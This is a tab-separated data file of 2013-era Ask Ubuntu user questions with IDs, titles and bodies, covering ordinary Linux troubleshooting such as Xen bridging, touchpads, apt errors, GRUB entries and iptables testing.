360107	create pv guest vm in ubuntu 12.04 using xen : `` network autoconfiguration failed ''	i am using instructions from here : https : //help.ubuntu.com/community/xenproposed http : //fosshelp.blogspot.com/2013/03/how-to-create-pv-guest-vm-on-ubuntu.html this is what i get when i type ifconfig : eth0 link encap : ethernet hwaddr 00:26:9e:58:68:18 inet6 addr : fe80 : :226:9eff : fe58:6818/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:390153 errors:0 dropped:1 overruns:0 frame:0 tx packets:15134 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:52072737 ( 52.0 mb ) tx bytes:1572505 ( 1.5 mb ) memory : c0200000-c0220000 eth1 link encap : ethernet hwaddr 00:26:9e:58:68:19 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) memory : c0240000-c0260000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:39 errors:0 dropped:0 overruns:0 frame:0 tx packets:39 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2664 ( 2.6 kb ) tx bytes:2664 ( 2.6 kb ) xenbr0 link encap : ethernet hwaddr 00:26:9e:58:68:18 inet addr:128.148.16.164 bcast:128.148.16.255 mask:255.255.255.0 inet6 addr : fe80 : :226:9eff : fe58:6818/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:194764 errors:0 dropped:0 overruns:0 frame:0 tx packets:14480 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:23743942 ( 23.7 mb ) tx bytes:1494934 ( 1.4 mb ) this is my /etc/network/interfaces : auto lo iface lo inet loopback auto xenbr0 iface xenbr0 inet dhcp bridge_ports eth0 auto eth0 iface eth0 inet dhcp when i type brctl show i get : bridge name bridge id stp enabled interfaces xenbr0 8000.00269e586818 no eth0 based on what i have read it seems i did everything ok , but when i am trying to install the guest pv i get the `` network autoconfiguration failed '' and `` the bad archive mirror an error has been detected while trying to use the specified ubuntu archive mirror . '' i think i 've done my homework can anyone help me ? how can i setup my pv guests ? did i do the network bridging correct ? can it be for the firewall ? any idea what i have done wrong ? i 've seen in the video of that blog that his ip change from 192.168.1.5 to 192.168.1.10 but my ip did n't change ? i am connected to the net with one ethernet cable to eth0 . ? ? ? ? thanks
360109	does ubuntu-13.04-desktop-amd64 supports intel ( r ) core ( tm ) i5-2320	can i use ubuntu-13.04-desktop-amd64 in order to install ubuntu on my laptop having intel ( r ) core ( tm ) i5-2320 processor
360110	what is the purpose of the rtai package in ubuntu	rtai ( realtime application interface ) is a linux kernel patch , that exposes an api to userland processes , which can be used to create very low latency and jitter programs for realtime tasks . i 've been looking into compiling my own patched kernel to work with rtai , but i 've noticed that the official ubuntu repositories contain a package called `` rtai '' . i 'm quite sure that this package does n't magically patch my kernel . for one thing , the current rtai release does not even support the kernel that 's running under my ubuntu installation . so what does that package do , and what is it useful for ? it creates a folder named `` kernel-patches '' under /usr/src , that contains some .patch.gz files for some 2.6.x linux kernels . it also comes with some userland libraries ( binaries and headers ) that you would normally use to compile your rtai application . when i try to compile a sample with those libraries , the executable , unsurprisingly , segfaults . the package description describes what rtai is and not what purpose that package is meant to serve .
360111	no audio while tab casting with chromecast and chromium	i just got my chromecast and it rocks , but i ca n't seem to get it to play audio while tab-casting from chromium . when using the direct cast options like youtube it works fine , and when i use other computers it also works fine , but on this laptop running ubuntu and chromium i get no audio . kind of sucks because i 'm really hoping to use spotify 's web client to stream spotify to my living room , which was one of the main reasons i got chromecast in the first place . has anyone else come across this problem ? any suggestions ?
360114	i want to save the data which is display on the command prompt while compiling a process	i want to save or copy the data which is displayed at the command prompt while compiling a process . for example , if i want to install a tool like lighttpd , i want to save whatever i do and see in the terminal to a file..
360123	how to get microsoft office 2007 logo in unity bar	i am a new ubuntu user . have successfully installed 12.04 64 bit . have also installed the wine and ms office 2007 . but i am unable to make ms office a default application , and bringing its logo to unity bar ? ? ? kindly help .
360124	not install success ubuntu 12.04 x64 on virtualbox when restart	i can`t install ubuntu-12.04.3-desktop-amd64.iso on virtualbox 4.1 . when install complete restart virtual machine not continue all processes ended within 3 seconds ... [ ok ] modem-manger [ 1433 ] : deconfiguring network interfaces ... [ ok ] unmounting temporary filesystems ... [ ok ] deactivating swap ... [ ok ] stopping remaining crypto disks ... [ ok ] stopping early crypto disks [ ok ] unmount : /run/lock : not mounted unmount : /run/shm : not mounted casper is resyncing snapshots and caching reboot files ... please remove installation media and close the tray ( if any ) then press enter : i used dell latitude e6240 and ubuntu 12.04 x64 real machine .
360125	how to downgrde from 13.04 to 12.04	my machine has installed with ubuntu 13.04 version , but i want to downgrade my os with ubuntu 12.04. my machine has only one os , that is ubuntu 13.04 . how can i downgrade my machine os to ubuntu 12.04 ? please help me with this.. thanks in advance
360126	lenovo yoga touchpad problem with unbuntu 13.04	i have removed windows 8 from my lenovo yoga 13 and installed ubuntu 13.04 . i have fixed the wireless issue and brightness control , however , the touchpad seems to be creating a headache for me . major problems i am facing is while typing the pointer moves to all sorts of directions when my palm touches the touchpad . in addition when i click on a certain object , the area adjacent to it is being click so i have to very carefully click on anything i want to click . is there a way to reduce the sensitivity or a proper driver to install to address this issue ?
360127	pc fails to start after formatting partition where ubuntu is installed	i installed ubuntu on a separate partition d : and at the same time i have win7 ultimate on partition c : yesterday , i formatted partition d : where my ubuntu is installed now my pc wont boot up . help
360129	otrs .opm package installation fails with error ?	scenario : i have downloaded the complete installation file of itsm after a successful installation of otrs/helpdesk . when i go to admin panal @ http : //localhost/otrs/index.pl ? action=adminpackagemanager and give a path of the opm file downloaded of all itsm packages and click install it gives me a below error . oops ! an error occurred . error message : 413 request entity too large - post_max=16384kb please contact your administrator . you can send a bugreport or go back to the previous page . error details : backend error : otrs-cgi-10 perl : 5.14.2 os : linux time : thu oct 17 11:00:45 2013 message : 413 request entity too large - post_max=16384kb traceback ( 19902 ) : module : `kernel : :system : :web : :interfaceagent : :run ( v1.58.2.1 ) line : 150 module : ` `modperl : :root : :modperl : :registry : :usr_share_otrs_bin_cgi_2dbin_index_2epl : :handler ( unknown ` `version ) line : 46 module : ( eval ) ( v1.89.2.1 ) line : 204 module : modperl : :registrycooker : :run ( v1.89.2.1 ) line : 204 module : modperl : :registrycooker : :default_handler ( v1.89.2.1 ) line : 170 module : modperl : :registry : :handler ( v1.99 ) line : 31' for the same error i also have attached a screenshot below : system configuration : linux opennms-dns 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux otrs :
360130	how to create a mac bootable live linux usb on windows ?	right , i 'll get right to it . how can i make a linux live usb on windows , that i can use on a mac . in front of me , i have a windows laptop , and a dropped mac book pro that wo n't properly boot . i need the live usb to see what 's wrong with the mac , but conventional methods wo n't work . running linux on vm on the windows is n't really viable , as it 's a very old laptop , and i can only do basic stuff on it . the live usb has to boot on the mac . spec on mac : 2.4ghz intel core i5 13.3 inch macbook pro model md313x bought early 2012 sort of in a rush ... thank you !
360134	after installing gnome mouse pointer dives into right side of the screen	so i installed gnome yesterday and i 've had this problem where if i hover my mouse to the right side of the screen it does n't stop at the right end of monitor , but goes deeper . some things that i 've noticed : when i hover my mouse in there , click it and drag it back it turns into a cross , but only when clicked , when i release , it goes back to normal and when i click mouse and hover in there the box does n't go in there with it , but it appears as if i would have dragged the mouse to the top left side of the screen , i will add a screenshot so that you see what i mean .
360137	pygtk application logo/icon	i 'm starting to develop some apps . i 'm reading through python gtk documentation . it 's all going fine but i have one question . how does ubuntu find application logos ? like the one it displays in the dash and stuff , and how can i add one to my test app .
360138	move apps to second display with no delay	when moving program windows to second display there is a delay on the edge of the screen which does not let me move windows smoothly to the other one . how can i remove this delay in such a way that i can drag windows to the other screen continuously with no interruption in between ?
360143	i have downloaded ubuntu 13.04 amd64.iso but ended up with 32bit os	i did ask this question before , i know , but as a newbee could n't find my question again . anyway , i have downloaded ( twice ) what i thought was the 64 bit version of 13.04 but when i check 'about this computer ' it tells me that i have the 32 bit version .
360149	apt-get and dpkg missing and/or broken , software center has segmentation fault	i 've gotten into a real bind here , i 'm not exactly certain when this happened but i 've been really perplexed on how to fix this issue . at the moment i ca n't get apt-get to work at all . as in , there is absolutely no response at all after entering any apt-get command , just a new command line . when i try to run the software center , i get a segmentation fault . sudo dpkg -- configure -a also does not give anything at all , only a new command line . i 've gone down these routes : why does my update manager keep crashing and apt-get segfaulting ? http : //ubuntuforums.org/archive/index.php/t-2162603.html and have removed both pkgsource.cache and srcpkgsource.cache from /var/cache/apt everything else i 've found uses apt-get in some way . i had not considered making a backup of the actual ubuntu filesystem before , just my own materials , but i 'll certainly be doing so in the future . i 'd like to not have to reinstall , are there any solutions ?
360152	check file on hdd during preseed	i am trying to install ubuntu 12.04 via preseed . i need to ckeck hdd for some files exists before continue the installation ( partitioning and etc . ) is there any ways to do that ?
360154	a bit of help with cron script please	i would like to set a cron on an ubuntu server to download a file to a specific location . how would i go about this ? for example once a day i would like my ubuntu server to look for a file on a website then download it and overwrite the existig file if present . something like wget http : //myexternalwebsite.com/downloads/filename cp filename /etc/myfolder/filename any help would be most appreciated . regards , matt
360157	keyboard is not working on my ubuntu ( running on a usb memory stick )	i installed my ubuntu on a usb , but the keyboard on my laptop does n't work . no keys on my keyboard are working . it 's a virtual usb drive .
360159	how can i change the default folder location that nautilus opens ?	the default is that clicking on the folder in the unity dock opens the home directory . since there are shortcuts for all the sub-folders of the home directory in the sidebar already , i 'd prefer the default directory to move to a different location ( ~/documents ) . how can i achieve this ?
360161	what advantages does ubuntu have as an environment for programming ?	why is writing a program in text files or via the terminal a better option ( as i read ) than using ide ( s ) like visual studio on windows ? do the features an ide provides exist there ( eg . showing compilation errors ) or is it a manual process ?
360167	middle-button scroll not working in ubuntu 12.04 [ thinkpad x230 ]	my track-point works , so does my track pad . the middle button of both my trackpad and my mouse can be used to close applications among other things . but i just can not use it to scroll ( the way we do in windows ) . i have tried almost everything listed out here : how to configure the trackpoint - thinkwiki i 've attached the outputs of a couple of commands here : root @ vishnu-pc : ~ # xinput list-props `` tpps/2 ibm trackpoint '' unable to find device tpps/2 ibm trackpoint and , root @ vishnu-pc : ~ # xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=9 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ integrated camera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=13 [ slave keyboard ( 3 ) ] i can not find my touchpad/trackpad listed anywhere here . i 've already installed gpointingdevicesettings and that has n't helped either . i 've also tried disabling the trackpad from bios to see if that would make a difference , but to no avail . what could possibly be wrong ?
360171	zend studio-5_5_0 not open in ubuntu 13.04	i installed zend studio-5.5.0 in ubuntu 13.04. but when i try to open it from bin folder it is not open . every time it open as a text editor .
360177	why has ubuntu 13.10 more recent packages than 13.04 ?	i do n't understand how some packages are managed in ubuntu . how are they moved from unstable to testing ? the debian faq says : unstable has the most recent ( latest ) versions . but the packages in unstable are not well tested and might have bugs stable contains old versions of packages . but this package is well tested testing falls between these two extremes at the moment i 'm running raring 13.04 ( unstable ) . saucy 13.10 ( testing ) has more recent packages , which breaks this rule . solution ubuntu 's version management is not the same as debian 's one : it 's development which then becomes , gets merged into , stable . the current state of ubuntu is : ubuntu raring 13.04 is stable ubuntu saucy 13.10 is development so it 's all normal to have more recent packages in saucy . see answers for more details . misunderstanding solved ; ) extension well , now i understood raring is stable and saucy development ( now is shifted to `` saucy -- > trusty '' as well ) , how can this situation be explained regarding the 'virtualbox ' package : raring ( 4.2.10-dfsg-0ubuntu2.1 ) saucy ( 4.2.16-dfsg-3 ) virtualbox ( 4.3.0-89960~ubuntu~raring ) here , raring provides newer than saucy , which fits ubuntu 's workflow . but virtualbox provides newest to stable ubuntu versions , instead of the development one . since the ubuntu development version is intended to be merged as a stable ubuntu in the end , it does n't make sense for virtualbox to provide for stable and not for development . any input about that ?
360179	sending hex with cutecom	i 'm working a lot with cutecom at the moment . but i could not yet find out how to send hex to the serial port . as an example i would like to send the character 0xff . in the description on the internet it says , that cutecom can do that . but how ?
360181	using iptables for testing application	i 'm testing my webapplication which connects to two dbs . i ca n't stop them but i want to simulate outage of one of them . so i opened one terminal where i 'm pinging db server : ping 172.21.7.188 in the second terminal i did : sudo iptables -a input -s 172.21.7.188 -j drop sudo iptables -a output -d 172.21.7.188 -j drop but i do n't see any change - pings still return . what am i doing wrong ?
360186	how to install separate+ gimp-plugin for cmyk support ?	in order to open cmyk photoshop files , i want to install the separate+ plugin for gimp . since for building separate+ from sources it is required editing the makefile by hand ( ? ) , i was hoping for an ubuntu package . i installed gimp-plugin-registry via apt-get , which is supposed to contain separate+ . after installing it , gimp has many new plugins enabled , but still does n't have cmyk mode nor does it open cmyk psd files . in the plugin browser i can see the separate plugin ( which already should have enabled cmyk image mode , no ? ) , but not the separate+ plugin . how can i get basic cmyk support please ? edit : ubuntu-64bit system edit2 : according to this post from 2011 , even with separate+ installed opening cmyk-psd files is not possible . does this still hold true end 2013 ? he lists some alternatives which all are not satisfactory . imho , already it is unfortunate for linux as a platform for artists , that cmyk support is not there out of the box in gimp , but at least the installation of the plugin should be easy . thanks
360187	how to install pypy3 ( 2.1 , beta ) on ubuntu ?	how do i go about installing pypy3 on ubuntu 13.04 ? the download link is here : http : //pypy.org/download.html i 've downloaded the linux 64-bit binary and the .tar.gz source . i 'm able to run pypy binary through the terminal , but that 's not a very ideal implementation as it requires me to point to the pypy binary directory every time i want to use it . the source wo n't really compile , and gives me this error : building pypy with jit , it 'll take about 40 minutes and 4g of ram rpython/bin/rpython -ojit pypy/goal/targetpypystandalone.py /usr/bin/env : pypy : no such file or directory make : *** [ pypy-c ] error 127 i 'm well aware that pypy3 is beta software , but i 'd like to have a spin with it anyway . edit : after installing the pypy ( python 2 ) package provided by ubuntu , i got a little further with the compilation process . a link to the output : http : //pastebin.com/qtmkpsep
360190	how to configure master-slave ldap replication	how do i configure master-slave ldap server on ubuntu with session replication . for example if and ldap client changes his password on the master server . i want the new password to be synchronized automatically to the slave server
360192	new ibus in ubuntu 13.10	i 'm having a hard time figuring out how to type using the japanese anthy method in this new ibus on ubuntu 13.10 , since ibus is the default input method it 's been changed since the last release . is it even possible to do that ?
360194	xubuntu . wireless network disappears !	after installing security onion with xubuntu ( 12.4.3-20130904.iso ) on my machine my wireless network disappears completely . it 's not visible in network settings with the icon in the bar also gone ! ? any help is appreciated . thanks , d .
360195	packages is not available for r version 3.0.2 in ubuntu-13.04	are packages available for r-3.0.2 in ubuntu-13.04 ? which list should i add in my sorces .list ? install.packages ( 'tm ' , dep=t ) installing package into ‘/home/ashish/r/x86_64-pc-linux-gnu-library/2.15’ ( as ‘lib’ is unspecified ) warning message : package ‘tm’ is not available ( for r version 3.0.2 ) i have the following in my /etc/apt/sources.list deb http : //cran.stat.ucla.edu/bin/linux/ubuntu raring/ edited install.packages ( 'tm ' ) it is working fine but with debian package it is not , what is the problem here ? thanks . any help to get all the are packages for the latest version ? any help , thanks
360198	how to reset libreoffice dictionaries to factory defaults ?	by mistake i have added a wrong word to my libreoffice dictionary . now i have checked my ignore list and it is not there but still if i type that wrong word it is not underlined as wrong . i want to remove that word from dictionary . please tell me how can i reset all the dictionaries to factory default settings .
360199	why does n't my 'get location ' option work in ubuntu ?	i 'm on ubuntu desktop os and i frequently use twitter to stay connected with my friends ( using chromium ) . when i try to update the location , i 'm presented with 'location service unavailable ' or sometimes 'error getting location ' . whereas when i 'm on chrome on windows it just works fine . why does n't it get the location ? p.s in settings i 've enabled default option for 'ask for location ' option . still unable to fix it . help ?
360200	webserver access to host shared folder	i have ubuntu webserver as guest in bridged mode running on virtualbox . my host machine is windows 7 . the webserver is up and running with lamp and webmin installed . i want to add a shared folder to my guest and make a hyperlink on my webpage so that anyone can download the files from that website via shared folder . without getting direct access to my host machine . the reason i want to do this is that my guest machine is only 8 gb hdd . and i dont want to make my host a webserver . pls help . im a beginner .
360203	connecting a usb printer hangs computer	with my distro ( kubuntu ) installed on a usb hdd , every time i connect either of my usb printers the system hangs in some way . usually the mouse and/or keyboard ( both usb ) stop working and if left for any time the whole system hangs even after removing the printer . a few times i have managed seen drive errors on the console but too quick to make note . it never did this when the system was installed on the sata hdd . i suspect that the sd card slots on the printer ( hp photosmart ) may have something to do with it and it 's been a problem since the fisrt installation to usb hdd at kubuntu realease 10 i have so far been unable to collect any information from the machine after the hang but suggestions how to do this would be appreciated . basic configuration details before plugging in ; linux mypc 3.8.0-31-generic # 46-ubuntu smp tue sep 10 20:03:44 utc 2013 x86_64 x86_64 x86_64 gnu/linux no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009bcd2 device boot start end blocks id system /dev/sda1 63 5124734 2562336 83 linux /dev/sda2 * 5124735 41993909 18434587+ b w95 fat32 /dev/sda3 41993910 927625229 442815660 83 linux /dev/sda4 927625230 976768064 24571417+ 82 linux swap / solaris bus 001 device 002 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 001 device 003 : id 0409:005a nec corp. highspeed hub bus 001 device 004 : id 152d:2329 jmicron technology corp. / jmicron usa technology corp. jm20329 sata bridge bus 004 device 002 : id 04d9:1135 holtek semiconductor , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 005 : id 1038:0510 ideazon , inc .
360204	how to fix result of command efibootmgr -t 0	i 've entered the efibootmgr -t 0 command accidentally , and now ca n't boot my os . any advice will help .
360205	setting pidgin up for lync2013	i having difficulty setting up pidgin to work with my company 's microsoft 365 's communicator lync 2013 ( not 2010 ) account . i either receive a message stating authentication failed , or incompatible authentication scheme chosen : ntlm depending upon the user agent values used from this wiki it appears that both the user agent values that start with uccapi provide authentication failed error , which i 'm guessing is `` closer '' to the solution . i have triple checked that the password is correct . below are some images of my settings ( i have changed the company name to `` company '' for annonymity . i am running pidgin with a script in order to fix a write error issue : export nss_ssl_cbc_random_iv=0 pidgin -d i am also using the latest version of sipe ( 1.10.1 ) by using this ppa : https : //launchpad.net/~aavelar/+archive/ppa what settings do i need to change/add to get it to work ?
360210	no options appear in the shell extension menu in advanced settings . i am using 12.04	i have downloaded some themes . they were not shown in advanced settings . i do n't see any options in the 'shell extensions ' tab . what should i do ?
360211	not able to kill a task using kill -9	i am trying to kill a process sublime_text using the kill -9 command . but the process is still there and so i am not able to open another instance of it . root @ alwin-linux : ~ # ps aux|grep subl root 3018 2.2 1.0 289008 61872 ? ds 12:30 5:27 /opt/sublime_text/sublime_text root 3037 0.0 0.2 65676 15364 ? sl 12:30 0:11 /opt/sublime_text/plugin_host 3018 root 6702 0.0 0.0 4432 820 pts/1 s+ 16:35 0:00 grep -- color=auto subl root @ alwin-linux : ~ # kill -9 3018 root @ alwin-linux : ~ # ps aux|grep subl root 3018 2.2 1.0 289008 61872 ? ds 12:30 5:27 /opt/sublime_text/sublime_text root 3037 0.0 0.2 65676 15364 ? sl 12:30 0:11 /opt/sublime_text/plugin_host 3018 root 6705 0.0 0.0 4432 824 pts/1 s+ 16:35 0:00 grep -- color=auto subl
360214	how to execute a python file from lxterminal ?	i have created a .py file and saved it in my `` python '' folder located on my desktop . now , i want to execute that particular file named `` use.py '' . how can i execute the file using lxterminal ?
360218	error prompt on startup , and `` disk has a few bad sectors ''	i am dual booting ubuntu 12.04 and windows 8 . earlier today , after restarting due to some input issues , i started getting the message upon selecting ubuntu from grub , `` errors were found while checking the disk drive for / '' . i opted to ignore it , and ubuntu loaded as normal . upon checking the disk utility tool , i see the smart status `` disk has a few bad sectors '' . when checking the specific information , i am given a warning for `` current pending sector count '' . what does this mean ? should i allow an automated attempt to fix the issue ? i 've had further trouble caused by allowing automated fixes to run before because of conflicts with windows 8 and uefi , but i have no idea if there is any association between that and this issue . i ca n't imagine this is due to physical hard drive damage , as it is very new hardware . thanks to anyone who can explain it .
360222	how to reclaim unused windows partition	i installed ubuntu 12.04 on a machine that previously have windows . on windows , there were three partition ; 110gb , 190gb & 190gb . i removed windows completely ( my bad , only from ) c drive and installed ubuntu on c drive ( 110gb ) now the problem is , only 100 gb is available for ubuntu ( 10gb swap ) . now i 'm running out of space in /home directory and wanted to reclaim earlier d drive ( 190gb ) in ubuntu . is there any way to do that or reinstalling ubuntu from scratch is only option . below image show quick summary of partition :
360224	is it possible to install openoffice and libreoffice in parallel ?	because of this bug i was forced to use an older version of libreoffice . but i would like to have the latest libreoffice - keeping in this way an eye on a possible future fix to the bug . and , when i need to avoid this bug , i would like to install in parallel a version of openoffice which is not affected by the bug ( e.g 3.4 ) is this possible ?
360228	backing up postfix + dovecot	i am renting a single server , on which i installed ubuntu 12.04 , postfix and dovecot ( and ispconfig ) . i would like to backup the full postfix+dovecot configuration , in order to restore it in case of a hdd crash . i will need to restore all the imap mailboxes ( users names , passwords , etc . ) as well as the mails and the folders . in short , someone with a mail account on the server should not be able to see there was a server crash , unless he/she tried to connect to the server during the short period of time during which it was under maintenance . my question is : which files should i backup ? ideally , i should backup some configuration files each time i create or delete mailboxes , and other files ( that contain the mails ) very frequently . i have already found that i should backup /var/vmail , but i do n't know if that 's enough . also , should i stop postfix before backing up ? if so , will the mail still be delivered ?
360230	check-in/check-out tool for dropbox in ubuntu ?	does anyone know whether there is a check-in/check-out tool for dropbox running ubuntu ? i 'm basically looking for the linux version of notifybox , which only supports windows .
360231	synaptics error `` no touchpad found '' at startup on hp laptop	i know there are a lot of topics on the synaptics touchpad not working , but i ca n't seem to find the answer to my problem anywhere . please forgive me if i missed it . here is what happened . after using the `` ambient light '' f11 key on my hp laptop ( compaq nc8430 ) , the touchpad was disabled and i could n't get it to work . then i found this thread : `` synaptic touchpad on laptop not working '' . and salem 's answer totally solved my problem , both for the session fix and for the permanent fix . but since then , after each reboot i get the same error pop-up , with the following content : no touchpad found . no touchpad was found in this system . if the system has a touchpad , please make sure that the synaptics driver is properly installed and configured . if your touchpad is not found , though the driver is installed and configured correctly , please compile detailed information about your touchpad hardware and report this issue to the issue tracker . needless to say , the driver is indeed installed , activated and configured ( even though it 's kind of useless now , since i guess the .conf file i created is doing all the work ) . i know it 's a minor issue , because the touchpad does work properly , but it 's getting really annoying ... so , could anyone please help me fix this error pop-up problem ? thank you ! edit : after trying unsuccessfully everything below following saurav 's advice , my popup problem is still there . to be clear , my touchpad does work perfectly since the fix i mentionned above . but the fix itself , namely the .conf file in modprobe.d , seems to be causing the error `` no touchpad found '' . so , is there anything i can do to prevent this confusion , for example a command to add in that .conf file ? or does anyone know of another method entirely to fix my touchpad permanently and not get a false error of missing touchpad ? thanks again .
360234	backlight turns on by itself asus laptop	every time i let my computer sit open while i do other things that require my attention i turn my backlight all the way down . for absolutely no reason ubuntu likes to turn my backlight all the way up without my discretion . this kills my battery like crazy so all i have to ask is why ? can someone help me out here ?
360236	how can i allow ajaxterm to connect to foreign hosts ?	i have installed ajaxterm from the repo and put it behind nginx . it works fine . however , it only allows to log in to the server it 's running on . how do i allow users to connect to an arbitrary host of their choice ? preferably , i 'd like to limit that choice to a list of pre-approved hosts but just allowing any host would be good enough . i 'd also like to avoid giving everyone shell access to the gateway server that ajaxterm is running on . possible ? serverdo seems to have it running like that .
360238	ubuntu 13.04 stuck in orange screen ( background ) after login every time i update it	every time i install ubuntu 13.04 ( i think is this version ) and update what it asks to update , restart the computer and log in , the computer stuck in the orange screen ( background ) and does n't load the up and lateral bars , so i ca n't do anything . i can still use text mode with ctrl + alt + f1 and the terminal through the shortcut , but i do n't know what to do without the rest of the graphic interface . someone knows what could be the problem ? it olny happens after update and only in my desktop . i updated ubuntu in notebook and i had no problem .
360240	ubuntu server - websites randomly do not respond	i have a server that is running ubuntu server , apache2 , railo , mysql , tomcat , and icecast/ezstream my issue started last week . i have 3 websites pointed to this server with the same dns , ip address and they are almost identical . website a - railo website with light traffic website b - wordpress with medium traffic website c - blank index.html the issue that i am having is that occasionally i get a page not found due to dns errors for these sites . it was happening to all of them but i switched my dns to a different company . this solved the issue except for website b.. website b i can access it on all of my pcs but i can not access it with ie on my windows 8 phone . i can , however , go to the other sites without any problem on my phone . it only happens for an hours or so then it works again . is it still caching from when i changed the dns ? could there be some sort of max connection problem in ubuntu or apache ?
360245	python 3 with pylab on ubuntu 12.04	i have ubuntu 12.04 and i 'm learning via python 2.7.3 ( specifically pylab - ipython , numpy , scipy and matplotlib ) . i thought it 's better to learn the newest version of python . using apt-get tells me that all of the above are the most recent versions . the reasons are explained here : changing python default in 12.04 lts so i apt-get python3 and ipython3 , but how to have the latest pylab set for my python3 interpreter ?
360248	how can i set view preferences to sorted by reverse date modified ?	i 'd like to permanently set nautilus 's view preferences to show files sorted in reverse by date modified ( newest first ) . similar questions have been asked before : how can i sort files in nautilus by modified date ? can i view my files sorted by date ? however , they do n't address making the preference permanent . nautilus 's preferences allow you to set sort by date modified ( oldest first ) , but not reverse date modified ( newest first ) . does anyone have suggestions on setting sorted by reverse date modified as default ?
360251	remove duplicate windows entry in grub2	hi there im quite new to linux i have problem with my grub windows entry show twice in the grub and probably in wrong partition as you can see there is 2 entry for windows 7 i can only boot to windows using loader on /dev/sda2 i think loader for windows should be on /dev/sda1 , but the loader on it render black screen to me i think i did something wrong with my windows and endup with this grub.. is there a way to fix this ? ( remove duplicate entry and change it to /dev/sda1 ) and here is my partition
360252	what do the stat column values in ps mean ?	in the stat column of ps there are a load of letters that do n't really make much sense . what do they mean ? here 's an example of ps aux | head : user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.0 27176 2960 ? ss sep20 0:02 /sbin/init root 2 0.0 0.0 0 0 ? s sep20 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s sep20 13:05 [ ksoftirqd/0 ] root 5 0.0 0.0 0 0 ? s < sep20 0:00 [ kworker/0:0h ] root 7 0.0 0.0 0 0 ? s < sep20 0:00 [ kworker/u:0h ] root 8 0.0 0.0 0 0 ? s sep20 2:16 [ migration/0 ] root 9 0.0 0.0 0 0 ? s sep20 0:00 [ rcu_bh ] root 10 0.0 0.0 0 0 ? s sep20 20:08 [ rcu_sched ] root 11 0.0 0.0 0 0 ? s sep20 0:07 [ watchdog/0 ] root 12 0.0 0.0 0 0 ? s sep20 0:05 [ watchdog/1 ] root 13 0.0 0.0 0 0 ? s sep20 2:21 [ ksoftirqd/1 ] root 14 0.0 0.0 0 0 ? s sep20 1:00 [ migration/1 ]
360257	how to cache ( more ) data on ssd/ram to avoid spin up ?	i have ubuntu server 12.04 running on a 40gb ssd with a raid 5 mounted for media files . i access the files often via samba either with a raspberry pi for music playback or with another pc for the other files . i want to avoid the spin up of the raid by caching often used data . this is already happening , when for exmaple i play back the same music folder after spin down . but it seems to only cache the last request i did . is there a way to make the cache larger/more intelligent ? for example i always want to have the root file structure of the raid cached . at the moment it appears only the last request before spin down is cached . it would also be awesome to cache the whole file structure so spin up is only needed when i actually access a file . tl ; dr is there a way to permantly cache something ? ( or something similar )
360261	system requirements for 12.04.3 ?	planning to use this version on an upcoming build until i can find a copy of winxp ( it 's a purposefully old build ) and need to know if i need to change any plans . also going to run it on a couple of other computers . where can i find an older version of ubuntu if my build ca n't handle it ?
360264	sound only works if i restart from windows	sound does n't work if i turn on , then load ubuntu . sound does work if i turn on , load windows , restart , then load ubuntu . sound does work if i restart from windows , load ubuntu , hibernate , turn on , then load ubuntu .
360265	ubuntu saucy - infinality	is there any repositories with infinality for ubuntu saucy ? in ubuntu 13.04 i have used this but now there is no packages for ubuntu saucy .
